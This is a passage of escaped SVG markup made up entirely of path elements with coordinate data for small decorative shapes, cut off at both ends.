d=\"M731.3,102.1c.1.2,1.4.3,3.2.4-1.4-.4,5.6,0,3.8-.5C733.7,101.9,735.7,102.3,731.3,102.1Z\"></path>\n <path d=\"M637.4,96.4c1.8,0,2.1.2,4.4.2-.6-.2,1.7-.2,2.5-.3A37,37,0,0,0,637.4,96.4Z\"></path>\n <path d=\"M575.1,93.5c3.6-.1,3.2-.7-2.2-.9C574.5,92.9,571.4,93.2,575.1,93.5Z\"></path>\n <path d=\"M530.4,91.7a26.2,26.2,0,0,1-2.8-.1c-.9,0-1.6,0-1.3.1,4.7.1-3.8.4,3.2.5C528.1,91.9,531.2,92,530.4,91.7Z\"></path>\n <path d=\"M518.1,90.3c0,.1.5.8,1.8.5-2.4-.5,8.7-.2,2.1-.7C522.5,90.4,521.2,90.4,518.1,90.3Z\"></path>\n <path d=\"M529.3,87.2c.1.1.3.1,1.5.1l-.4-.4c-2.7,0-6.1-.1-5.4.2A41.09,41.09,0,0,1,529.3,87.2Z\"></path>\n <path d=\"M661.7,87.7c1,.3,1.7.6,6.2.7C667.9,88,665.7,87.8,661.7,87.7Z\"></path>\n <path d=\"M593.9,80.2c-5.8-.1,1.1-.3-4.5-.4.4.4,1.3.7,3.6,1C592.2,80.4,595.4,80.5,593.9,80.2Z\"></path>\n <path d=\"M525,77.6c-1.6.1-5.2.1-7,0C517.4,78.2,529.5,77.9,525,77.6Z\"></path>\n <path d=\"M745.9,79.3c-.5.2-2.8.6,2.1.8C747,79.9,749.2,79.4,745.9,79.3Z\"></path>\n <path d=\"M661,77.4c-1.2-.3-1.2-.7-3.6-1C655.2,76.6,656.4,77.3,661,77.4Z\"></path>\n <path d=\"M660.4,73.6c2.5-.3,3.6.5,5.7.1-4.9-.6-.6-1.7-4.4-1.8-2.1,1.4-12.4,3.2-5.6,4.7C662.2,75.9,668.4,75,660.4,73.6Z\"></path>\n <path d=\"M636.6,73.4c-6.1-.2-4.3.5.5.6C636.9,73.7,636.7,73.6,636.6,73.4Z\"></path>\n <path d=\"M601.8,71.7c1.4,0,2.8.1,4.3.1l-.4-.4C601.9,71.2,602.2,71.5,601.8,71.7Z\"></path>\n <path d=\"M749.9,68.1c-5.8-.1-3.6.5-.7.7C749,68.5,748.1,68.2,749.9,68.1Z\"></path>\n <path d=\"M593.6,64c-.9-.2,1.2-.5-1.9-.6.5.2-.8.3-4,.2.9.2-1.2.5,1.9.6C588.6,63.9,590.9,63.7,593.6,64Z\"></path>\n <path d=\"M610.1,62.3c-1.6-.4-1.6-.4-.6-.7a23.82,23.82,0,0,1-2.8-.1c-.9,0-1.7,0-1.3.1,4.1.2.6.5-.9.5C608.3,62.2,607.5,62.4,610.1,62.3Z\"></path>\n <path d=\"M749.3,64.2c-.2-.4-.8-.8-3.7-1.1C747,63.7,745.2,64,749.3,64.2Z\"></path>\n <path d=\"M597.7,57.7c-.4.2-2.8.2-2.4.5C598.9,58.2,602.8,57.8,597.7,57.7Z\"></path>\n <path d=\"M601.8,57.5c-5.3-.5,2.2-.4-3.4-.7-1.4.2-1.3.5-2.1.7C598.9,57.6,599.2,57.5,601.8,57.5Z\"></path>\n <path d=\"M748.1,59.7c-2.1.3,1.2.5.9,1C751.3,60.7,750.6,59.9,748.1,59.7Z\"></path>\n <path d=\"M599.7,56.7c1.8-.1,1.9-.6-2-.7C598.6,56.2,596.5,56.6,599.7,56.7Z\"></path>\n <path d=\"M727.2,56.4c-3.8-.1-4.5,0-3.9.3,2,0,3.2.1,4.4.2C727.3,56.7,724.7,56.6,727.2,56.4Z\"></path>\n <path d=\"M737.8,55.9c1.9,0,3.2.1,4.4.2,0-.3-.9-.6-3.4-.7C739.4,55.6,738.9,55.8,737.8,55.9Z\"></path>\n <path d=\"M869.9,52.8c1.3.4-2.2.3-.8.6,3.3.1,5.4.1,7,0C876.1,53.1,873.9,52.9,869.9,52.8Z\"></path>\n <path d=\"M626,40.8c-3.5-.1-4.8.4-2.3.5C625.1,41.2,627.5,41.2,626,40.8Z\"></path>\n <path d=\"M647.7,38.7c-3.6.1-2.1.7,2.2.9C647.5,39.2,649.9,38.9,647.7,38.7Z\"></path>\n <path d=\"M639,35.1a4,4,0,0,0-1.6-.3c.2.2.3.4.5.6,3.7.2,6-.2,2.4-.4C640.3,35.1,640.2,35.2,639,35.1Z\"></path>\n <path d=\"M755.1,31.3c-2.7,0-3.2-.2-5.8-.2,5.2.7-5.5,1,1.3,1.4C753,32.2,750.2,31.4,755.1,31.3Z\"></path>\n <path d=\"M688.7,25.2a10.17,10.17,0,0,1-2.7,0c-.3-.1,0-.3-1.7-.4,1.2.5.4,1,4.9.9C683.7,25.5,694.9,25.5,688.7,25.2Z\"></path>\n <path d=\"M706.2,19.9a26.2,26.2,0,0,1-2.8-.1c-.4-.2.1-.4-1.8-.5-.4.2-2.8.2-2.3.5C702.5,20,705.5,20.3,706.2,19.9Z\"></path>\n <path d=\"M739.6,13.7c1-.1,1.7-.2,1.7-.4,1.1.4,3.7.8,5,1.2-.5-.4-3-.9-5.5-1.5a.08.08,0,0,1,.1.08v0a34.18,34.18,0,0,0-3.5-.3C738.5,13.1,736.3,13.5,739.6,13.7Z\"></path>\n <path d=\"M527.9,101.5c4.5.1,11.5.6,13,.5-5.8-.3-12.8-1.1-6.8-1.4-4.7-.2-.8.3-5.5.1.3-.1,1.8-.2,1-.4a31,31,0,0,0,4.2.1c-1.9-.4,2-.2,2.4-.4-8.4-.3-4,.6-13.7.2-5.8.7-1,1.9-1.3,3-.1.3-.7.6-2.2.9,2.2.3,2.9.1,4.4.3-4.5.1.1.4-2.1.7a41.51,41.51,0,0,1,6,.5c-2.8-.1-1.5.3-5.5.1-2.5-.1-.4-.5-3.3-.6.8.3-3.8.5-.8.6a98.06,98.06,0,0,1,10,.3c3.9-.6-.1-1.3-4.5-2,.1.1-1,.1-1.4,0,2.7.1,1.9-.2,3-.2h1c2.8.2,2.4.6,4.8.8a21.29,21.29,0,0,1,4.3.1c-5.7-1.4.5-1.9-8.1-2.9-.1.1.5.3-1.1.3C525.6,101.8,526,101.6,527.9,101.5Z\"></path>\n <path d=\"M732.3,103.2c-.7.3,4.1.3,3.3.6-6.8-.1-2.6.5-6.4.6,6.2-.1-.9.3.6.7,8.9-.4,4.4-1.6,7.7-2.3C729.7,102.6,738.3,103.3,732.3,103.2Z\"></path>\n <path d=\"M526,99.3c-2.3.1-8.6.3-5,.7C519.7,99.4,528.4,99.9,526,99.3Z\"></path>\n <path d=\"M524.2,94.1c4.2,0,1.8-.7,4.8-.9,8.1.5,10.1,1.7,1.6,1.8-1.4-.3,1.7-.2.9-.5-4.9,0-5.7,1.1,1.2,1.3-.8-.8,6.3-.8,10.1-1.2-1.7-.1-4-.1-4.4-.2,7.2.2.4-.4,5.2-.4-2,.2,5.1.4,4.3.2-3.4-.1-3.5-.4-6-.6,1.2.3-2.7.1-4,.2.2-.2-2.1-.3-3.1-.4,5.3-.1,7.5,0,9.4-.3-4.6-.2-4.2.1-7.1-.2,1.9.5-4.6.2-5.2.4l-.3-.3c-1.9,0-3.8-.1-5.7-.1C528.3,93.5,521.8,93.8,524.2,94.1Z\"></path>\n <path d=\"M536.7,95.7c2.9-.1,4.8-.3,6.5-.5C537.2,94.9,535.1,95.6,536.7,95.7Z\"></path>\n <path d=\"M734.1,99c3.5.1,2.9-.1,7,0C740.5,98.1,739.3,98.7,734.1,99Z\"></path>\n <path d=\"M519,89.8c8,.1.4-1.1-2.6-1.4-.6.2-6.7.7-3.7.6,2.4,0,2-.4,5.3-.3C515.9,89.2,521.6,89.4,519,89.8Z\"></path>\n <path d=\"M652.2,86.4c-1.3-.9-6.3-2.1-1-2.8-5.1,0-2.2.2-5.8-.2,2.4.7-11.4,1.2-3.7,2.1-1.7,0-4-.1-4.2,0,6.1.1,1,.4-1,.4,2.8.6-.4,1.4-1,2.1,3.4-.1,7.1.4,7.1.2-2-.1-1.8-.3-3.1-.4,8.8.2,6.5-.2,12.5,0-6.6-.3,1.6-1.2-5.2-1.2C646.8,86.3,651.5,86.5,652.2,86.4Z\"></path>\n <path d=\"M609.4,72.5c4.1.1,11.6,1,3.2.5.3.4,6.8.4,8.9.6-.5-.4-3.6-.6-4.9-.9C615.6,73.2,611.9,72.1,609.4,72.5Z\"></path>\n <path d=\"M603.1,63.8a15.43,15.43,0,0,1-2.8-.1,64,64,0,0,0,7.8.9C606.2,64.4,607.1,63.9,603.1,63.8Z\"></path>\n <path d=\"M601.6,63.6c-1.4-.3,7.4.3,2.7,0a6.88,6.88,0,0,1-1.5-.1c-.1-.1,2.4,0,2.6-.2C602,62.8,597.5,63.4,601.6,63.6Z\"></path>\n <path d=\"M599.9,60.1c-8.5-.4,4.4-.8-3.9-1.3-2.1.7-4.2,1.6-4.6,2.7C598.8,61.3,592.5,60.3,599.9,60.1Z\"></path>\n <path d=\"M754.7,60.9c2-.7,3.2-1.4,3.6-2.2-4.6-.1-1.6-.7-7.6-.7C760.3,58.7,749.6,59.9,754.7,60.9Z\"></path>\n <path d=\"M598.3,55.2c4.7-.2,2.4-.6,7.6-.8-9.4.2,4.6-.4-6.2-.7C598.3,54.6,597,54.4,598.3,55.2Z\"></path>\n <path d=\"M601,53.5c0-.2,4.6,0,3.9-.2-1.1-.1-2.8-.1-2.9-.2,2.1,0,5.3.2,5.6,0-3.9-.3,3.8-.7-2.2-.9,2.3.1,3.7-.1,1.2-.2a19.08,19.08,0,0,1-4,.1c.2.3,2.7.4,2,.7-4.1,0-.6.2-5.4.2C603.1,53,596,53.3,601,53.5Z\"></path>\n <path d=\"M600,49.2c9,.1.5.9,6.4,1-.7-.3,0-.4,2.6-.2,0-.6,1.8-.5-3.4-.7.6-.5,3.2-.2,5.2-.4-2.3,0-9.8-.6-7.3-.4C607.4,48.9,602.5,49.1,600,49.2Z\"></path>\n <path d=\"M643.7,37.3c-.2-.2.5-.2,1.1-.3-5.2-.1-10.6-.6-17-.4,1.5.2,1,.6,3.4.7,1.3-.4.4-.5,3.6-.7C634.5,37.1,643.4,36.9,643.7,37.3Z\"></path>\n <path d=\"M686.7,26.1a14.19,14.19,0,0,1-3.9.3c-.1-.1-.3-.1-1.5-.1a8.94,8.94,0,0,0,3.2.5C682.1,26.4,692.6,26.6,686.7,26.1Z\"></path>\n <path d=\"M722.6,95.4a28.18,28.18,0,0,0-7.5-.6c-.2.2,2.1.3,3.1.4-5.8-.1-12.8.2-6.4.6-9,.4-16.9,1.3-11.5,2.7-3.4.5-11.3,1.3-5.1,2.1-5,0-.7.8-3.3,1,1.7.1,3.4.1,3,.3-7.9,1.3-2.1,3-8.6,4.4,7.5.2,1.7.8,5.1,1.1.7-.4,4.7-.5,6.2-.8-1.7-.1-4-.1-4.3-.2a29.54,29.54,0,0,1,5.4-.2c4.4,0,1,.6,6.1.6-13.3-2.2,18.3-2.7,6.9-4.8a20.06,20.06,0,0,0,4.1-.1c-8-.6,5-1-2.7-1.5,7.2.2,3.1-.8,1.9-1,9.2-.5,1.1-1.8,7.5-2.6-2-.2-2.2-.4-4.7-.5,6.4.2,4.4-.2-.1-.1-.1-.2-.6-.4-1.8-.5,4.5,0,4.6.3,7.1.2C724.3,95.5,715.8,95.3,722.6,95.4Z\"></path>\n <path d=\"M750.3,110.5c-2.7-.3-.9.9.5,1.1C750.9,111.2,751.8,111.1,750.3,110.5Z\"></path>\n <path d=\"M770.6,108.3a42.59,42.59,0,0,0-7.2-1c4.7,1.1,1.7,1.7,5.2,2.9-.6-.5-.5-.8,2.8-.3C770.3,109,769.1,108.7,770.6,108.3Z\"></path>\n <path d=\"M766.9,104.6c1.4.3,2.1.5,4.2.8.8,0,1.2-.1.8-.4C769,104.6,769.1,104.9,766.9,104.6Z\"></path>\n <path d=\"M768.1,103c.7.6-1,1,3.8,1.8C771.2,104.4,774.4,104.3,768.1,103Z\"></path>\n <path d=\"M745.3,93.6c-4.8-1-3.5,0-.8.4C744.1,93.7,744.5,93.6,745.3,93.6Z\"></path>\n <path d=\"M768.6,95.7c-1.8-.1-.3.6,1.4,1C769.3,96.3,770.9,96.1,768.6,95.7Z\"></path>\n <path d=\"M914.7,118.4c0,.8-1.8-.5-5.3-1a21.54,21.54,0,0,0,4.5,1.4,5.88,5.88,0,0,1,2,.2C915.7,118.9,916.1,118.7,914.7,118.4Z\"></path>\n <path d=\"M745.2,89.2c-3.3-.6-3.5-.3-3.9-.1a9.76,9.76,0,0,0,3.4,1.1c.7-.2-1.8-.6-2.4-.9a21,21,0,0,0,4.1.5C745.2,89.5,745.2,89.4,745.2,89.2Z\"></path>\n <path d=\"M753.7,82.5c-.1-.4-3.3-.5-2.4-.9,3.1.7,2.8-.7-1.7-1.5-.1.5-1.2.5,1.6,1.3-8.4.1-9.5,2.2-5.5,4.9-2.2-.2-2.2.1-3.9,0,3.2,1.2-3.7,1.5,3.2,2.8-1.9-1.3,1.5-2.2,1.2-3.6-.1-.6-2.8-1.8,1.3-1.3-.2.1-1.4,0-.8.3,6.6,1-.3-.9,2.7-.6.6.5,2.9.6,1.3.8,2.8.5,2.6.2,2.9,0-1.8-.5-2.5-1.3-.5-1.1-2.2-.5-1.3-.2-4.2-.7.7.4.7,1.2-2.8.2,5.1.6-.2-1,2.5-.8a24.35,24.35,0,0,0,4.3.9c-.8-.6-.1-.4-3.4-1.1C751,82,754.4,83.1,753.7,82.5Z\"></path>\n <path d=\"M919.6,106.2c-2.8,1.6-6.4,2.3-6.4,4.9,1.7.4,4.5,1,5.5,1.4-5.8-1.2-.7.8-6.1-.6-.6.4-.8.8,1.7,1.6-1.1-.7,2.6.2,4.1.6-.2-.2.1-.3.8-.3-1.7-.5-4.5-.9-5.4-1.1,1.2-.2,3.5.2,7,.5-2.2-.8.2-.5.6-.8-6-1-.7-.9-3.7-1.7,1.3.2,1.4.1,3.1.4-1.6-.6-.5-.8.5-1-1.3-.3-2.4-.5-3.3-.8,5.3-.4,2-2.2,5.6-2.5l-2.1-.3A12.12,12.12,0,0,0,919.6,106.2Z\"></path>\n <path d=\"M929.1,114.2c-2.7-.4-4-.5-4-.2,2,.3,2.3.5,1.2.4,1,.2,2.1.3,3.1.5C928.3,114.4,928.3,114.4,929.1,114.2Z\"></path>\n <path d=\"M925.7,110.9c1,.6-1,.4-.6.8C929.6,112.6,928.9,111.5,925.7,110.9Z\"></path>\n <path d=\"M925.4,106.1c-3.8-1-8.8-.7-4.9,0C920.5,105.6,922.4,105.7,925.4,106.1Z\"></path>\n <path d=\"M888,100.6c-.3-.4,3.5-.3.5-1C889.5,100.2,884.6,99.8,888,100.6Z\"></path>\n <path d=\"M646.5,59.9c1,.2,2.1.3,3.1.5.3-.2,2.1-.3-1.4-.9C647.8,59.7,645.8,59.4,646.5,59.9Z\"></path>\n <path d=\"M911,102.4c-.1.3.6.7,2.4,1.1C912.7,103.1,914.8,102.9,911,102.4Z\"></path>\n <path d=\"M920.4,101.6c7.6,1.3.7-.6,3.6-.6C918,100.1,922.6,101.5,920.4,101.6Z\"></path>\n <path d=\"M954.4,106.1c-.9-.1-1.9.4.4.8C955.8,107,956.7,106.6,954.4,106.1Z\"></path>\n <path d=\"M934.9,101.7a10.32,10.32,0,0,1,2.2.5c-.8-.1-1.2-.1-.9.1,2.8.5,2.6.2,2.9,0C936.4,101.8,935.7,101.5,934.9,101.7Z\"></path>\n <path d=\"M926.5,98.2c-4.7-.7-.6,1.2-6.9-.3,1.9,1,3,1.3.8,1.7,4.7.8,3.4.1,4.8,0C920.3,98.5,929.4,99.4,926.5,98.2Z\"></path>\n <path d=\"M906,95.6c-2.6-.8.1-.6-4.5-1.4C901.8,94.6,902.5,95.1,906,95.6Z\"></path>\n <path d=\"M921.7,98.1c.8-.2,3.5-.1-.5-1C922,97.6,918.5,97.4,921.7,98.1Z\"></path>\n <path d=\"M956.7,102.7c1.6.1,3.4,0-1.3-.8C956.1,102.2,954.5,102.4,956.7,102.7Z\"></path>\n <path d=\"M929.9,97.1c1.1.4.6.7,2.4,1.1C933.8,98.2,933.8,97.6,929.9,97.1Z\"></path>\n <path d=\"M955,99.1c-2.7-.5-3.9-.1-1.8.4C953.8,99.4,955.7,99.6,955,99.1Z\"></path>\n <path d=\"M822.7,76.8c1.6,0,1.1.8,3.5,1.2-1.1-.6,1.3-.4.5-.9C824.2,76.8,820,76,822.7,76.8Z\"></path>\n <path d=\"M954.7,98.3a7.45,7.45,0,0,1-2-.1,5.75,5.75,0,0,0,2.3.8C955.2,98.9,956.1,98.7,954.7,98.3Z\"></path>\n <path d=\"M907.2,89.8c-1.4-.6,1.5,0,1.9-.1-2.5-.6-4.3-.4-7.2-.9C904.3,89.2,905.9,89.5,907.2,89.8Z\"></path>\n <path d=\"M946.5,95.4c-.7.2,1.8.6,3.4,1C951.2,96.2,950.4,95.8,946.5,95.4Z\"></path>\n <path d=\"M907.6,88.8c-.4.3-1.7-.5-3.2-.6a14.05,14.05,0,0,1-2.9,0,56,56,0,0,1,6.3,1.2C906.8,88.9,910.8,89.4,907.6,88.8Z\"></path>\n <path d=\"M887.5,85.1c-1.8-.3-3.3-.6-4.3-.8a5.13,5.13,0,0,0,2.4,1.1C884.7,84.8,887.2,85.3,887.5,85.1Z\"></path>\n <path d=\"M890.7,83.5c-2.2-.3-2.1-1.1-3.4-1,2.5.9-8.7-1.2-3.9,0C885.2,82.5,888,83.4,890.7,83.5Z\"></path>\n <path d=\"M897.9,84.4c-1.9-.2-4.7-.6-5-.4C896.3,84.6,897.8,84.7,897.9,84.4Z\"></path>\n <path d=\"M1056.2,110.9c2.9.5,2.9.2,2.9-.1C1055.8,110.2,1055.9,110.5,1056.2,110.9Z\"></path>\n <path d=\"M893.1,82.5a17.84,17.84,0,0,1-3.3-.8c1,.6-1.2,1,2.8,1.8C893.1,83.1,891.9,82.8,893.1,82.5Z\"></path>\n <path d=\"M923.4,87.3c-.4.3-5.3-.1.5,1C922.2,87.6,926.4,88,923.4,87.3Z\"></path>\n <path d=\"M930.9,84.8c1,.5-2.8-.2-1.8.3,1.1.2,2.1.3,3.1.5C931.6,85.1,934.5,85.5,930.9,84.8Z\"></path>\n <path d=\"M918.5,82.9c.3-1,1.3-.9,3-1.8-5.3-.9-5.7-.8-1.8.3-2-.4-2.2-.2-4.1-.6C919.4,81.8,914,82.1,918.5,82.9Z\"></path>\n <path d=\"M918.3,80.5c4.8.8,3.8,0,4.7-.3C919,79.6,919.6,80.3,918.3,80.5Z\"></path>\n <path d=\"M722.2,46.1c-4.1-.8-1.3,1.2-.5,1C721.8,46.5,721.5,46.4,722.2,46.1Z\"></path>\n <path d=\"M945,81.8a13,13,0,0,1-3.1-.4c3.8,1,1.2,1.1,4.8,1.9C945.9,82.8,947.5,82.4,945,81.8Z\"></path>\n <path d=\"M890.7,73.1c-3-.6-2.6-.3-5.2-.8-.2-.2-.4-.3-2.2-.6C882.7,72.2,890.6,73.5,890.7,73.1Z\"></path>\n <path d=\"M1009.7,91.9c-.1.2-3,.4,1.5,1.1C1010.4,92.6,1012.1,92.4,1009.7,91.9Z\"></path>\n <path d=\"M936.2,79.4c1.9.8-5.4-.9-5.1-.5,3.1.6,2.3.9,4.5,1.4C934.7,79.8,940.1,80.4,936.2,79.4Z\"></path>\n <path d=\"M741.9,46.7c-2.8-.4-4.4.5-1.5,1C740.5,47.2,741.8,47.1,741.9,46.7Z\"></path>\n <path d=\"M1001.9,89.8c-3.8-.9-1.6-.9-4.6-1.5.1.6,2.4,1.3,3.8,2C1000.1,89.8,1002.5,90.2,1001.9,89.8Z\"></path>\n <path d=\"M940.9,79.1c-.4.2-1.8.4.6,1.2C941.6,80.2,943.5,79.9,940.9,79.1Z\"></path>\n <path d=\"M935.5,77.9c-1.8-.3-3.3-.6-4.3-.8-.6.4,2.3.9,2.6,1.3-1.5-.3-1.9-.5-3.3-.8a.35.35,0,0,0,.1.2c-.7-.1-1.2-.2-1-.1,3.3.5,1.6.6,4.4,1.1,2.7,0,.4-.5-.5-1.2A13.6,13.6,0,0,0,935.5,77.9Z\"></path>\n <path d=\"M924.6,77.3c.2-.3,2.1-.8-.7-1.6C923.6,76.2,920.8,76.2,924.6,77.3Z\"></path>\n <path d=\"M764.7,49.9c.6-.2-3.8-1.3-5.4-1.2,1.9.3,2.5.5,2.3.7C762.6,49.6,763.6,49.7,764.7,49.9Z\"></path>\n <path d=\"M751.3,46.1c-2.5-.3-4.5-1.1-5.2-.9,1.6.4,3,1,1.4.9l2.1.3c.6.1,1.2.2,1,.1C746.7,45.7,753.5,46.9,751.3,46.1Z\"></path>\n <path d=\"M1049.1,95.4c-2.4-.4-4-.7-5.2-.8.2.2,0,.3,1.2.5C1044.4,94.8,1050.3,96.1,1049.1,95.4Z\"></path>\n <path d=\"M891.8,69.4c-2.5-.7-5.2-.7-7.4-1.3C884,68.5,889.8,69.2,891.8,69.4Z\"></path>\n <path d=\"M941.8,76.9c3.4,0,1.5.6,4.4,1.1.2-.5-1-1-5.6-1.7C940.8,76.5,940.4,76.6,941.8,76.9Z\"></path>\n <path d=\"M890.2,65.8c-5.8-.7-6.1,0-4.5.8,3.3.4,3.3-.2,5.8,0-3.5-.9-2.2,0-4-.2a8.44,8.44,0,0,0-1.2-.4C887.4,65.8,890.4,66.2,890.2,65.8Z\"></path>\n <path d=\"M1005.1,86.2c3.3.6,2.2,0,6.2.8-.2-.2.1-.3.8-.3C1009.3,86.4,1006.9,86.3,1005.1,86.2Z\"></path>\n <path d=\"M895.6,67.1c0,.1-.1.1-1-.1,0-.2-1-.4-2.3-.7.7.4-.9.6,1.4,1-.1-.1-.1-.2-.2-.4C895.9,67.5,898.6,67.7,895.6,67.1Z\"></path>\n <path d=\"M749.3,41.8c.1.4-3.3.4.5,1.1C749.3,42.5,752.4,42.5,749.3,41.8Z\"></path>\n <path d=\"M887.3,63.9a13,13,0,0,1-3.1-.4c-1,.4,3,1.1,4.6,1.7C889.6,65.1,889,64.3,887.3,63.9Z\"></path>\n <path d=\"M1130.5,104.1c1.3.2,1.5.4,3.2.6-.4-.3,1.3,0,1.9,0A21.88,21.88,0,0,0,1130.5,104.1Z\"></path>\n <path d=\"M779.9,45.1c3.5.6,5.6.3,1.8-.4C780.2,44.6,781.3,45.2,779.9,45.1Z\"></path>\n <path d=\"M971.3,76.1c-1,0-4.7-.1-.7.7a5.88,5.88,0,0,1,2,.2C968.9,76,974.2,76.9,971.3,76.1Z\"></path>\n <path d=\"M892.3,62.1c-4.3-.7-8.6-.3-4.6.6-.8-.4.2-.4,3,.2C886.9,61.8,895.8,63.1,892.3,62.1Z\"></path>\n <path d=\"M1084.6,94.9c2.7.2,2.5-.4-1.5-1.1C1084.3,94.3,1081.9,94.3,1084.6,94.9Z\"></path>\n <path d=\"M1051.7,88.7l-2.1-.3c-.6-.1-1.2-.2-1-.1,3.5.6-2.9,0,2.3.8C1049.9,88.6,1052.3,89,1051.7,88.7Z\"></path>\n <path d=\"M897.1,61.9c2.5.4.9.6-.8.3-1.1-.3-1.9-.6-3.3-1,.3.3-2,.4,1.5,1.1,1.1-.5,1.5.6,5.3,1C900.7,63.4,901,62.3,897.1,61.9Z\"></path>\n <path d=\"M1045.7,86.2c.3.3-.7.2-3-.2,0,.1.2.8,1.3.7C1042.4,86,1050.5,87.4,1045.7,86.2Z\"></path>\n <path d=\"M1027.2,83.8a20.39,20.39,0,0,1,2.2.6c.5-.2,3.6-.1-.4-.8C1030.1,84.1,1028.3,83.9,1027.2,83.8Z\"></path>\n <path d=\"M1008.3,78.7c-.3.2-2.9-.3-1.8.3a21.3,21.3,0,0,0,4.2.7c.2.2.1.4,2.3.7l-.3-.6C1009.4,79.3,1010.4,79.1,1008.3,78.7Z\"></path>\n <path d=\"M769.3,36.9c1.4-.2-3.6-.7-3.3-.9,4.7.6-2.5-.9,1.8-.4-2-.3-2.4-.5-4.3-.8.3.9,2.5,1.9-1.1,1.8,3.3.8,1.3,1.4,4.9,2.3.1-.5,1.3-1-.9-1.9,1.1-.1,4.5,1,4.1.5C768.1,37,765.1,35.9,769.3,36.9Z\"></path>\n <path d=\"M898.2,60.1l-5.2-.9c0,.3-1.8,0,1.3.7C894.2,59.6,898.2,60.4,898.2,60.1Z\"></path>\n <path d=\"M856.5,51.7c1.3.6-2,0-2.9.1a17.84,17.84,0,0,1,3.3.8C857.9,52.6,858.8,52.2,856.5,51.7Z\"></path>\n <path d=\"M795,42.2c-3-.7-.8-1.1-4.8-1.9C791.1,40.8,790.1,41.2,795,42.2Z\"></path>\n <path d=\"M836.8,48.8c-.7-.5,2.7.2,2.9-.1-1.4-.2-2.3-.4-3.2-.6C837.7,48.6,833.5,48.1,836.8,48.8Z\"></path>\n <path d=\"M911,60.6c-.3.2-4-.6-2.9,0C911.4,61.2,913.8,61.2,911,60.6Z\"></path>\n <path d=\"M747.2,33.1a5.88,5.88,0,0,1-2-.2c0,.3.8.6,2.4,1C746.2,33.3,750.4,33.8,747.2,33.1Z\"></path>\n <path d=\"M760.1,35.8c-.1-.4-1.2-.8-3.5-1.2,0,.2-3.4-.5-3-.2C756.3,34.9,756.9,35.3,760.1,35.8Z\"></path>\n <path d=\"M1052.6,84.4c-.1-.2-.1-.3-.2-.5-2-.3-4.5-.7-4-.3,1.8.3,2.6.3,3.2.5C1051.6,84.2,1051.7,84.2,1052.6,84.4Z\"></path>\n <path d=\"M889.9,57c-1.1-.5,2.6.2,2.9,0a28.82,28.82,0,0,1-4.3-.9C887.9,56.2,887.7,56.4,889.9,57Z\"></path>\n <path d=\"M842.5,48.7c1.7.3.7.4,2.3.7-1.7-.7,5.7.6,1.8-.3C847.5,49.6,841.6,48.3,842.5,48.7Z\"></path>\n <path d=\"M792.2,40.4c1.4-.4,3-1.3-2.2-2.6-3.1-.2,2.2,1.1,1.6,1.4a19.06,19.06,0,0,0-3.1-.4C792.8,39.5,789.2,39.7,792.2,40.4Z\"></path>\n <path d=\"M893.8,56.9c0-.3,1.7-.2,1.7-.5C892.6,55.9,891.5,56.4,893.8,56.9Z\"></path>\n <path d=\"M823.4,45.1c.5-.2,2.4.1,1.7-.4C822.8,44.4,819.8,44.5,823.4,45.1Z\"></path>\n <path d=\"M772.8,36.3c1.3-.1.9-.5-2.5-1.2C770.4,35.4,771.1,35.8,772.8,36.3Z\"></path>\n <path d=\"M1149.9,97.9c.7.4,1.2.8,4.5,1.3C1154.5,98.8,1152.9,98.4,1149.9,97.9Z\"></path>\n <path d=\"M768.8,33.8c.8-.3-5.4-1.3-5.3-1C766.4,33.2,766.3,33.4,768.8,33.8Z\"></path>\n <path d=\"M788,35.4c1.5.3,1.9.5,3.3.8-1.7-.8-1.4-1-2.7-1.7C788.6,34.9,787,34.8,788,35.4Z\"></path>\n <path d=\"M757.2,29.7a24.5,24.5,0,0,0,3.5,1.2C760.6,30.5,760.9,30.2,757.2,29.7Z\"></path>\n <path d=\"M822.2,40.4c3.2.5,4.3-.1,1.5-.9C824.5,40.1,819.4,39.6,822.2,40.4Z\"></path>\n <path d=\"M792.7,35.2c3.8.6,4-.2-.5-1A7.77,7.77,0,0,1,792.7,35.2Z\"></path>\n <path d=\"M771.3,30.8c-2.5-.4-2.5-.8-4.4-1.2,1,.7,1.1,1.4,5.9,2.3C773.3,31.5,766.8,30.3,771.3,30.8Z\"></path>\n <path d=\"M755.5,28.2c2.7.2-2.4-1.1.5-.9-2.8-.4-2.2-.6-4.3-.9C753.8,27.2,751.7,27.1,755.5,28.2Z\"></path>\n <path d=\"M769.3,28.7c-3.3-.6-1.8.1-3.9-.1,2.5.4,1.2.7,3.4,1.1a5.85,5.85,0,0,1,2,.2c-2.2-.9.8.1,1.9-.1C769.8,29,767.5,28.9,769.3,28.7Z\"></path>\n <path d=\"M894.1,49.3c-3.4-.7-2.9.4.4.8C895.2,49.9,891.9,49.2,894.1,49.3Z\"></path>\n <path d=\"M1097.3,82.7a4.69,4.69,0,0,0,2.5,1.3c-.6-.4,1.8.1.8-.4C1096.4,82.9,1101.5,83.4,1097.3,82.7Z\"></path>\n <path d=\"M833,38.6c-.4.1-3.3-.4-1.9.1,1.2.2,3,.5,3.2.6s0,.3,1.2.5C836.9,39.8,834.7,39.2,833,38.6Z\"></path>\n <path d=\"M768.9,27.8c-1,0-2-.1-3-.2.2-.2-.5-.5-2.3-.8-.4.3,2.5.9.3.7,2,.3,2.4.5,4.3.8C766.3,27.7,772.4,28.6,768.9,27.8Z\"></path>\n <path d=\"M773.8,28c-.8.1-4.2-.6-2.9.1,1.6.2,3.9.7,4.1.6a10.32,10.32,0,0,1-2.2-.5C772.8,28,777.4,28.7,773.8,28Z\"></path>\n <path d=\"M756.1,25.3c.2-.2,3.1.3,4,.2-2.4-.4-4-.7-5.2-.8C755.1,24.9,754.9,25,756.1,25.3Z\"></path>\n <path d=\"M775.5,27.5c-.2.2-3.8-.5-4-.3,3.8.5,1.9.7,5.4,1.2C776.2,28.1,777.9,27.9,775.5,27.5Z\"></path>\n <path d=\"M800.7,31.7c-5.5-1.1-2.1.5.2.5C798.3,31.7,800.5,31.7,800.7,31.7Z\"></path>\n <path d=\"M767,25.8c.4.3,9,1.8,5.2.9,0,.1-.1.1-1-.1-.2-.2,0-.3-1.2-.5C770.1,26.3,767.2,25.7,767,25.8Z\"></path>\n <path d=\"M798.2,30.4c-4.8-.6-3.8-.4-6.4-1.3-.3.3-.2.4-2.8.2,3.2.7,4.3.7,7.5,1.5,1.1,0,1.1-.1-.2-.5C797.5,30.4,798.7,30.6,798.2,30.4Z\"></path>\n <path d=\"M775,26.4c-3.3-.6-4.2-.6-5.1-.5,1.8.3,3.3.6,4.3.8C773.9,26.4,775.3,26.6,775,26.4Z\"></path>\n <path 